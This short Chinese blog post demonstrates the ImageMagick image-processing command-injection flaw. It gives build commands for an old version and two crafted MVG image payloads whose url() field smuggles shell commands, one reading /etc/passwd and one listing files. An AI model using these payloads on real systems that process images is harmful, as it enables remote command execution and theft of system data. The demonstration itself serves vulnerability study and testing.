ImageMagick漏洞演示

原創 hello_simon 2018-08-22 07:09
centos安裝

tar zvxf ImageMagick-6.4.0-0.tar.gz
cd ImageMagick-6.4.0-0
./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with-quantum-depth=8
make
make install

僞造圖片,把下面的幾行內容複製到記事本,然後改爲圖片名後綴。
注意url那裏一定要https才行,後面的cat /etc/passwd是linux命令

push graphic-context

viewbox 0 0 640 480

fill 'url(https://www.vm129.com/a.jpg "|cat /etc/passwd ")'

pop graphic-context


下面這個是freebuf提供的例子,帶參數的命令
push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg "|ls "-la)'

pop graphic-context


執行



測試了兩個版本6.4.0和6.7.2,都有bug


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

類型混淆漏洞實例淺析

4DOGS 2019-02-23 00:37:58

又一次redis被刪庫跑路,索要0.6比特幣

冷暖己知 2019-02-23 00:29:40

sturts漏洞

vivisrf 2019-02-23 00:23:05

Android高效安全加載圖片的方法詳解

我爱宋慧乔 2019-02-24 12:42:54

地址解析協議ARP

與誰爭鋒 2019-02-23 13:41:55

seo行業是否能規範 百度人工干預出招

zuotuitui 2019-02-23 13:37:36

Java IO流學習總結

mada26 2019-02-23 13:06:05

arp欺騙實驗報告

乘風來 2019-02-23 13:00:59

開源代碼

NetworkAD 2019-02-23 00:38:28

JavaScript 圖片滑動切換效果

53856943 2019-02-23 00:35:22

圖片

zhangaxiu 2019-02-23 00:33:45

圖片

zhangaxiu 2019-02-23 00:33:45

Android面試常見問題

謝老大 2019-02-23 00:31:48

setScaleType

lwklwc 2019-02-23 00:29:40

android 常見分辨率(mdpi、hdpi 、xhdpi、xxhdpi )及屏幕適配注意事項

lwklwc 2019-02-23 00:29:40